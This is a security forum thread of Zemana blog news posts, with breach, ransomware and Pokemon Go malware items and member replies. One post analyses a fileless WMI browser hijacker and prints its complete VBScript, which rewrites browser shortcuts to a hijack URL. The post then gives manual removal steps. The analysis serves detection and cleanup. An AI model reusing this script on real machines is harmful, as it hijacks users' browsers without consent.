Zemana Blog News Update

Discussion in 'Zemana' started by jasonX, Jul 10, 2016.

  1. jasonX

    jasonX Giveaways Moderator Staff Member

    [​IMG]


    Nearly 150,000 user data hacked from dating site “Muslim Match”


    Amina Zilic of Zemana Ltd., shares her news (lifted) from Zemana's Blog about the data theft leakage and how can we learn from it. In the future she will also update us from the Zemana Blog directly.

    150,000 users’ credentials and passwords on the dating site “Muslim Match” were hacked and 700,000 private messages between users were posted online.

    Muslim Match site is a free site where people could join from around the world and connect with others in order to share experiences, ideas, personal thoughts and information with the aim to find a perfect and suitable match for themselves.

    Source

    Related Info HERE
     
    LowcyGier and dinosaur07 like this.
  2. Google Adsense

  3. Argerra

    Argerra Zemana Developer

    [​IMG]

    Recently, we discovered browser hijacker altering shortcuts by inserting http://yeabests.cc argument. When you open your browser, instead of your favorite search engine, you will be presented with this one:

    [​IMG]

    This is nothing new when it comes to browser hijacking, I would say it's well-known trick, but I was fascinated by how this malware works and the idea they came up with to stay undetected by altering your shortcuts over and over again after cleaning.

    This so-called fileless malware lives inside WMI (Windows Management Instrumentation)or more precisely, as a Visual Basic script inside ActiveScriptEventConsumer class.

    The script is executed by the WMI Standard Event Consumer scripting application, which can be found in the WMI folder in %system32%\wbem\scrcons.exe. Of course, this makes the script hard to detect since it uses a not-so-common WMI application scrcons.exe rather than the traditional JS applicationwscript.exe.

    Windows built-in application wbemtest.exe or WMIExplorer can be used to access this script.

    [​IMG]

    Below is the content of VBScript used to hijack browsers:

    Dim objFS
    Set objFS = CreateObject("Scripting.FileSystemObject")
    On Error Resume Next
    Const link = "http://yeabests.cc"
    browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
    Set BrowserDic = CreateObject("scripting.dictionary")
    For Each browser In browsers
    BrowserDic.Add LCase(browser), browser
    Next
    Dim FoldersDic(12)
    Set WshShell = CreateObject("Wscript.Shell")
    FoldersDic(0) = "C:\Users\Public\Desktop"
    FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
    FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
    FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    FoldersDic(4) = "C:\Users\Rafael\Desktop"
    FoldersDic(5) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu"
    FoldersDic(6) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
    FoldersDic(7) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    FoldersDic(8) = "C:\Users\Rafael\AppData\Roaming"
    FoldersDic(9) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
    FoldersDic(10) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
    FoldersDic(11) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
    Set fso = CreateObject("Scripting.Filesystemobject")
    For i = 0 To UBound(FoldersDic)
    For Each file In fso.GetFolder(FoldersDic(i)).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
    set oShellLink = WshShell.CreateShortcut(file.Path)
    path = oShellLink.TargetPath
    name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
    If BrowserDic.Exists(LCase(name)) Then
    oShellLink.Arguments = link
    If file.Attributes And 1 Then
    file.Attributes = file.Attributes - 1
    End If
    oShellLink.Save
    End If
    End If
    Next
    Next
    createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

    As you can see, malware is able to hijack 14 different browsers by checking their executables:
    IEXPLORE.EXE
    chrome.exe
    firefox.exe
    360chrome.exe
    360SE.exe
    SogouExplorer.exe
    opera.exe
    Safari.exe
    Maxthon.exe
    TTraveler.exe
    TheWorld.exe
    baidubrowser.exe
    liebao.exe
    QQBrowser.exe

    Zemana AntiMalware removes this malware and cleans altered shortcuts.

    [​IMG]

    Manual removal

    The manual removal of this malware isn't hard at all.

    • Press Windows button + R on your keyboard at the same time. Type wbemtest and click OK.
    [​IMG]

    • Windows Management Instrumentation Tester window will open. Click Connect.
    [​IMG]

    • Type root\subscription exactly like on the image below:

    [​IMG]


    • Click Open Class on the next window and type ActiveScriptEventConsumer.

    [​IMG]

    • Now you need to click Instances.
    [​IMG]


    • And then to finally remove this malware:
    [​IMG]

    Only thing left is to remove argument from your browser shortcuts.
    • Right click on desired shortcut and select Properties.
    • Remove http://yeabests.cc argument after "
    • Click OK to apply changes.

    Save yourself the hassle and install Zemana AntiMalware.


    Additional Information:
    Md5: a718bf376567abd3e7de06f31b036405
    VirusTotal: Yeabests installer

    Resources:

     
  4. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    Hello -Argerra-!!

    Thanks for this information!! :)
     
    LowcyGier and jasonX like this.
  5. Argerra

    Argerra Zemana Developer

    No problem at all:))
     
    LowcyGier and jasonX like this.
  6. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    And welcome to TbT!! :D
     
    LowcyGier and jasonX like this.
  7. Argerra

    Argerra Zemana Developer

    Thank you:)
     
    LowcyGier likes this.
  8. Argerra

    Argerra Zemana Developer

    Android users are at risk since Pokemon Go, worldwide known app, has a malicious version.

    The game is created by Niantic and it takes users out into the real world by using geo-markers scanned with their phone's camera to "find" Pokémon in the wild.

    The popularity of this app is so high that can even pair with Twitter in terms of daily active users.

    It is discovered that that there is a malicious version of the app that was modified in order to include the malicious remote access tool (RAT) known as DroidJack which gives the attackers the possibility to fully control victim’s phone. In less than 72 hours the malicious APK was already uploaded to the malicious file repository.

    What caused this to happen? Read more here.
     
    LowcyGier, guardian and jasonX like this.
  9. jasonX

    jasonX Giveaways Moderator Staff Member

    Hello Argerra,

    Thanks for posting an update from your Zemana Blog! Welcome to Tweakbytes!!!! The team is happy you are here :)

    jasonX

    [​IMG]


    G+ Share
     
    LowcyGier likes this.
  10. jasonX

    jasonX Giveaways Moderator Staff Member

    GREAT INFO there!!!

    Thanks very much!


    G+ Share
     
    LowcyGier and guardian like this.
  11. guardian

    guardian Administrator Staff Member

    hi Argerra it is my honour to be able to welcome you to our forum. Just about to head off to work but I plan to read your threads more closely when I get home this arvo. They definitely are a MUST READ. thank you for joining TBT and thank you jasonX for introducing us to Argerra.
     
  12. dinosaur07

    dinosaur07 Senior Member

    Hello Argerra, thanks a lot for the updates and workarounds you presented us. We will be at least better informed and of course protected. I`m a user of ZAM and I`m very interested in all the new "net nasties" floating in the cyberspace. :cool:
     
    LowcyGier, jasonX and guardian like this.
  13. guardian

    guardian Administrator Staff Member

    checked mine and did manual search and all came back clean
     
    LowcyGier, Argerra and jasonX like this.
  14. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    Did the manual check, as well, and much to my joy....that nasty thing was not there. :)

    Running a ZAM Smart Scan, as well. And that malware was not detected by ZAM, either!! :)
     
  15. jasonX

    jasonX Giveaways Moderator Staff Member

    [​IMG]

    Pokémon Go catches all your personal data

    Amina Zilic of Zemana Ltd., shares her news (lifted) from Zemana's Blog about the data leakage attributed to the latest craze Pokémon Go

    While you catch Pokémon creatures, Pokémon Go catches a lot of your personal information.

    Source


    Source Reference HERE
     
    LowcyGier and BC2Tweak like this.
  16. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    Good to know!! :)

    However, I've no interest in Pokemon Go (in any way, manner, shape or form), so I don't have to worry about the data leakage problems. :)
     
    LowcyGier likes this.
  17. jasonX

    jasonX Giveaways Moderator Staff Member

    Zemana AntiMalware scores FIRST in MRG's In-the-wild Ransomware Protection Comparative Analysis 2016

    [​IMG]

    Zemana AntiMalware has just placed FIRST in the latest MRG Effitas In-the-wild Ransomware Protection Comparative Analysis 2016 Q3 besting among others Malwarebytes Anti-Ransome, Cryptoprevent, HitmanPro Alert and Bitdefender Anti-ransome!!!

    To quote directly from the report,

    1.4 Executive summary
    We tested the ransomware protection tools against eleven different ransomware, which have been prevalent in-the-
    wild over the past 3-4 years. First, we installed the protection tool into the system, then started the ransomware
    (or ransomware dropper), and when the ransomware process exited (or was killed), we scanned the system for the
    presence of encrypted files.


    [​IMG]

    Based on this report, Zemana AntiMalware proved to be the best ransomware protection among the tested
    products during the test. These scores are not normalized with the prevalence of the ransomware samples.
    Usually, the most prevalent samples are included in these generic protections, but as always, life (and IT Security) is
    never simple.


    More Info can be found HERE

    Zemana Blog report about the MRG result HERE
     
    LowcyGier, Gdant, BC2Tweak and 2 others like this.
  18. jasonX

    jasonX Giveaways Moderator Staff Member

    [​IMG]

    Server hosting Cerber ransomware campaign shuts down

    Amina Zilic of Zemana Ltd., shares her news (lifted) from Zemana's Blog about the ransomeware campaign detected by FireEye

    Do you remember just last month that corporate Office 365 users were targeted with malicious emails? Well, that was a part of the over whole Cerber ransomware campaign which servers are now shut down.

    According to a blog post written by two researches from FireEye, the server used in the Cerber ransomware campaign has been shut down with the efforts of FireEye, the Computer Emergency Response Teams in the Netherlands (CERT-Netherlands), and web hosting companies.


    Source

    References HERE

    Cerber Ransomware Info HERE
     
  19. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    Very cool!! :)
     
    LowcyGier likes this.
  20. Gdant

    Gdant Senior Member Known Member

    Zemana Anti-malware is best of its kind:) but I am seriously missing their second product too (Zemana Anti-logger).:p
    Will anti-logger be supported in future?o_O
     
    LowcyGier and jasonX like this.
  21. jasonX

    jasonX Giveaways Moderator Staff Member

    [​IMG]

    Avoid and defeat ransomware by applying these must-have tips

    Amina Zilic of Zemana Ltd., shares her news (lifted) from Zemana's Blog about how to avoid/defeat this scourge "ransomeware".

    Ransomware – if the world itself sounds so terrible, imagine than the consequences of a ransomware attack.

    We all know that once you get infected with ransomware your sensitive data gets encrypted and attackers demand some form of payment to decrypt it.


    Zemana Blog Source HERE
     
    LowcyGier, frogboy and BC2Tweak like this.
  22. jasonX

    jasonX Giveaways Moderator Staff Member

    --Fowarded your query to Argerra :)
     
    LowcyGier and Gdant like this.
  23. Gdant

    Gdant Senior Member Known Member

    thanks jasonX:)
     
    LowcyGier likes this.
  24. Argerra

    Argerra Zemana Developer

    Hi Gdant,

    We are glad that you like both of our products and Zemana AntiLogger will be supported in the future. Stay tuned:)
     
    LowcyGier, frogboy and Gdant like this.
  25. Gdant

    Gdant Senior Member Known Member

    I came to know that the new anti-logger will be having same type of UI that Zemana anti-malware has..;)
    Cann't wait to be the beta tester for it!!:D
    I will be happy to join if it is there:)
     
    LowcyGier likes this.
  26. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    And not only backup, but have good protection in place to begin with!! :)

    I am very happy to be using both Zemana AntiMalware and AntiLogger, because they are superb security products. I've used AntiLogger longer than ZAM, because I wasn't aware of ZAM until earlier last year. I do use other security products, as well. Both products work exceptionally well and do not hog System Resources. They are also not complicated to use (i.e very user-friendly). Some security products that I have used or am using, are a little more complicated to use, and are especially user-friendly, however, that does mean they are not exceptional products. I do look for user-friendliness in a product that I am reviewing, as I look from the user's POV. :)

    All of the above was for free.... :D

    I'd really also appreciate the opportunity to do some more Beta Testing for Zemana. Was very happy to help them with the ZAM Product. :)
     
    LowcyGier, Gdant and frogboy like this.

Share This Page